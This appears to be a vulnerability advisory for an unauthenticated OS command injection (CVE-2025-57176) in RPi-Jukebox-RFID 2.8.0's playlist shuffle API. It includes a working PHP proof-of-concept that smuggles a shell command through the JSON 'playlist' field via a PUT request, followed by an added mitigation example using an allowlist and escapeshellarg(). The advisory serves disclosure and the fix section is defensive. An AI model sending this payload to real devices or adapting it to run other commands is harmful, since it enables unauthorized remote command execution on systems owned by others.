RPi-Jukebox-RFID 2.8.0 Command Injection
=============================================================================================================================================
| # Title : RPi-Jukebox-RFID 2.8.0 OS Command Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/MiczFlor/RPi-Jukebox-RFID |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214067/ & CVE-2025-57176
[+] Summary : RPi-Jukebox-RFID version 2.8.0 suffers from an OS command injection vulnerability in the API endpoint:
/phoniebox/api/playlist/shuffle.php
The "playlist" JSON parameter is passed directly into a shell command without proper sanitization or escaping. This allows unauthenticated
remote attackers to execute arbitrary system commands.
[+] POC: A crafted PUT request with a malicious JSON payload allows execution of OS-level commands such as file creation.
php poc.php
<?php
$target = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php";
$injectedCommand = "test';touch indoushka.txt;echo '";
$data = json_encode([
    "playlist" => $injectedCommand,
    "shuffle" => "true"
]);
$headers = [
    "Content-Type: application/json",
    "User-Agent: Mozilla/5.0"
];
$ch = curl_init($target);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
echo "[+] Sending malicious JSON payload...\n";
$response = curl_exec($ch);
if ($response === false) {
    echo "[-] cURL Error: " . curl_error($ch) . "\n";
} else {
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo "[+] HTTP Status Code: {$httpCode}\n";
    echo "[*] If vulnerable, file 'indoushka.txt' will be created on the server.\n";
}
curl_close($ch);
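[+] Mitigation example : added here, not part of the original advisory and not the project's code. It contrasts the concatenation pattern the summary describes with an allowlist check plus escapeshellarg(), run against the same "playlist" value as the PoC. The script path, the --playlist option, the single-quote wrapping and the allowlist pattern are assumptions made for illustration.

```php
<?php
// Added example: not RPi-Jukebox-RFID code. Script path and option name are hypothetical.
const SHUFFLE_SCRIPT = '/opt/example/shuffle_playlist.sh';

// Unsafe pattern: the request value is concatenated into the command line.
// The single-quote wrapping is an assumption based on the PoC payload's shape.
function buildCommandUnsafe(string $playlist): string
{
    return SHUFFLE_SCRIPT . " --playlist='" . $playlist . "'";
}

// Decode the JSON body and accept only a plain playlist name.
function parsePlaylistRequest(string $rawBody): string
{
    $body = json_decode($rawBody, true);
    if (!is_array($body) || !is_string($body['playlist'] ?? null)) {
        throw new InvalidArgumentException('playlist must be a JSON string');
    }
    // Assumed allowlist: letters, digits, space, dot, underscore, hyphen;
    // first character alphanumeric so the value cannot look like an option.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9 ._-]{0,127}\z/', $body['playlist'])) {
        throw new InvalidArgumentException('playlist contains disallowed characters');
    }
    return $body['playlist'];
}

// Quote every argument so the shell sees exactly one word per value.
function buildCommandSafe(string $playlist): string
{
    return escapeshellarg(SHUFFLE_SCRIPT) . ' --playlist=' . escapeshellarg($playlist);
}

// Constructed sample bodies: the PoC's payload and a benign request.
$poc    = json_encode(['playlist' => "test';touch indoushka.txt;echo '", 'shuffle' => 'true']);
$benign = json_encode(['playlist' => 'Kids Songs', 'shuffle' => 'true']);

// Commands are only printed here, never executed.
echo "unsafe : ", buildCommandUnsafe(json_decode($poc, true)['playlist']), "\n";
echo "quoted : ", buildCommandSafe(json_decode($poc, true)['playlist']), "\n";
try {
    parsePlaylistRequest($poc);
} catch (InvalidArgumentException $e) {
    echo "reject : ", $e->getMessage(), "\n";
}
echo "benign : ", buildCommandSafe(parsePlaylistRequest($benign)), "\n";
```

On PHP 7.4 and later, passing the command to proc_open() as an array starts the process without a shell, which removes the quoting problem altogether.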
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
- Written by: khalil shreateh
- Category: Vulnerabilities